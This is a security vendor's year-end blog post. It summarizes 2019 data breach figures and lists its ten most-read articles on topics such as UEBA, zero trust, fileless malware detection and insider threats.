How serious was cybercrime in 2019? According to research firm Risk Based Security, 2019 was the “worst year on record” for data breaches. And considering the massive breaches we saw in preceding years, that’s really saying something.
In late 2019, the firm issued a report announcing a 33% spike in data breaches over the previous year. They found a massive 5,183 breaches with 7.9 billion exposed records year to date. 2019’s breaches stemmed from a number of different types of attacks, including ransomware, business email compromise, malicious insiders and more.
If there was one theme to the cybersecurity landscape in 2019 it might be “the year of the unsecured database”. Incidents involved Amazon AWS, Elasticsearch and other databases. Some belonged to companies, others were apparently stolen data. Wyze was the most recent company to suffer such a fate. Cultera Collecteva was also a victim in 2019, as was Honda.
In 2019 our blog covered all manner of data breaches and cyberattacks. As always, some were more popular with readers than others. Here are our 10 most read Gurucul blog posts of the year as measured by pageviews.
10. Security Analytics is the New Approach to IoT Security
Internet connected devices are abundant – TVs, speakers, refrigerators, watches, fire alarms, door locks, cameras, medical devices,fitness trackers and much more. IoT is driving true transformational changes to the modern IT infrastructure. But, the unintended consequence of IoT is a vast, porous security perimeter. Increased connectivity means increased security threats. And the IoT is largely “undefendable” using traditional cybersecurity architectures. In Security Analytics is the New Approach to IoT Security, we look at ways organizations can get a handle on this growing threat.
9. The Role of Security Analytics in a Zero Trust Environment
The Zero Trust security model centers on the belief that organizations should not trust anything either inside or outside the perimeter. Instead, zero trust stresses that everything and everyone attempting to connect to systems must be verified before granting access. In The Role of Security Analytics in a Zero Trust Environment, we explore how Gurucul has always aligned with the zero trust concept, even long before the term was in vogue.
8. Why Signature Based Defense is No Longer Adequate
Signatures are no longer effective at preventing today’s advanced cyber threats. While indicators of compromise (IOCs) are useful in forensic reviews and mapping attacks, information security leaders must think in different ways when it comes to defending their environments. The post Why Signature Based Defense is No Longer Adequate covers one of these different approaches to the problem – User and Entity Behavior Analytics (UEBA).
7. A Security Evolution: Taking Security Beyond SIEM with Gurucul Security Analytics
Traditional SIEMs import data, normalize that data and provide minimal enrichment (details). Correlation rules specify a sequence of events that indicates an anomaly, or potential security threat. The reason why this technique is outdated is because it generates significant amounts of false positives. Also, it is incapable of detecting new, and especially, unexpected threats. What if you had the technology to predict a breach before it happens? A Security Evolution: Taking Security Beyond SIEM answers that question.
6. What is Big Data?
Big Data is made up of structured, semi-structured and unstructured data sets. These data sets are difficult to process using traditional database and software techniques because of the 3 Vs of big data – volume, velocity and variety. The data is simply too big (volume), moves too fast (velocity) or surpasses the current processing capacity (variety). Read What is Big Data? to learn all about Big Data analytics, Data Lakes, Data Warehouses, UEBA vendors offering open choice big data and more.
5. Stop Fileless Malware with Abnormal Powershell Command Execution
Fileless malwareis malicious code that exists only in memory. Because this type of malware never gets installed on the target computer’s hard drive, it doesn’t exist as a file, so it eludes intrusion prevention systems and antivirus programs. Users systems typically become infected with fileless malware via visiting malicious websites. Fileless malware exploits the vulnerabilities of PowerShell to conduct backdoor activities. Our post Stop Fileless Malware with Abnormal Powershell Command Execution looks at machine learning models that can stop this type of dangerous attack.
4. A is for Analytics
The first post in our popular blog series ABCs of UEBA is about analytics, particularly security analytics. Read A is for Analytics to learn all about the process of transforming user and entity behavior data into risk-prioritized intelligence, for the purpose of driving business action.
3. What is Machine Learning?
The big data discipline of artificial intelligence gives systems the freedom to automatically gain information and improve from experience without manual programming. Machine learning (ML) is literally just that – “letting the machine learn”. What is Machine Learning? explores the background of machine learning, where it fits in the overall AI structure, and how Gurucul leverages this technology to detect and predict anomalous behavior that’s indicative of a cybersecurity threat.
2. Insider Threat Survey Report: RSA 2019
At the 2019 RSA Conference, Gurucul conducted an Insider Threat Survey. We wanted to get a sense for just how prevalent the Insider Threat is in the minds of the practitioners. 671 international IT professionals responded. Our post Insider Threat Survey Report: RSA 2019 examines key findings from the survey.
1. Famous Insider Threat Cases
Insider threats are the biggest security risk for organizations because they can cause the most destruction. From taking advantage of privileged access to stealing company data – sometimes the biggest and worst threats to a company’s security program is right under its nose. In our most read post of 2019 – Famous Insider Threat Cases – we look at some of the world’s most destructive insider threat incidents, and discuss how these events could have been prevented.
Happy new year and thanks for reading the Gurucul blog.